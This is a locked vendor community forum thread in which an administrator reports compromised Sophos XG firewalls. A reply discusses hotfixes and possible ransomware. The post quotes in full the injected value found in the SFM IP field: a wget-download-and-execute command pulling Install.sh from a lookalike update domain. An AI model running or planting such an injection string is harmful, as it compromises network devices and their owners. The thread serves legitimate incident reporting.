This discussion has been locked.
You can no longer post new replies to this discussion. If you have a question you can start a new discussion

XG firewalls connected to SFM were no longer able to connect or synchronize to SFM. - Notice the following change on the settings

Hello All,

Weird issues we notice today the XG firewalls connected to SFM were no longer able to connect or synchronize to SFM.

After looking at the settings on the XG firewalls affected we noticed that in place of the SFM IP address was this parameter: 

||cd /tmp/ && wget sophosfirewallupdate.com/.../Install.sh -O /tmp/x.sh && chmod 777 /tmp/x.sh && sh /tmp/x.sh|| 

After removing this parameter and pointing it to our SFM IP we were able to get that firewall to successfully synchronize and connect to SFM.

What I want to know is what could have cause that settings to change. No one from our team has made this change. I believe SFM templates does not have the capability to push this settings.

This is very concerning and alarming and would like to know if anyone has any ideas or where to look.  I already opened a case with Sophos and was on the phone with them for about

3 hours reviewing and grabbing logs.Thoughts on this ! - Attach screenshot of one of the XG firewall

 



This thread was automatically locked due to age.
Parents Reply
  • Hi Yashraj,

    Thank you for these instructions. I have followed them through and implemented on my firewall. I have also enabled the hotfix auto install as per the instructirons on the links

    https://community.sophos.com/kb/en-us/135415 and https://community.sophos.com/kb/en-us/135412 

    However, the hotfix has not applied as yet despise several reboots of the firewall. Customer support have requested for firewall access ID for 1 week which I have sent. I hope they can fix it as soon as possible. Interesting, is that two of my machines were attacked by Ragnarök Ransomware on 29th April 2020, would this be associated to this Vulnerability. We have been investigating and now have logs from the Kaspersky endpoint. If interested I can forward the logs.

    Kindly also send instructions on how I can Add One Time Password for remote access users.

     

    Regards,

    Nicholas.

Children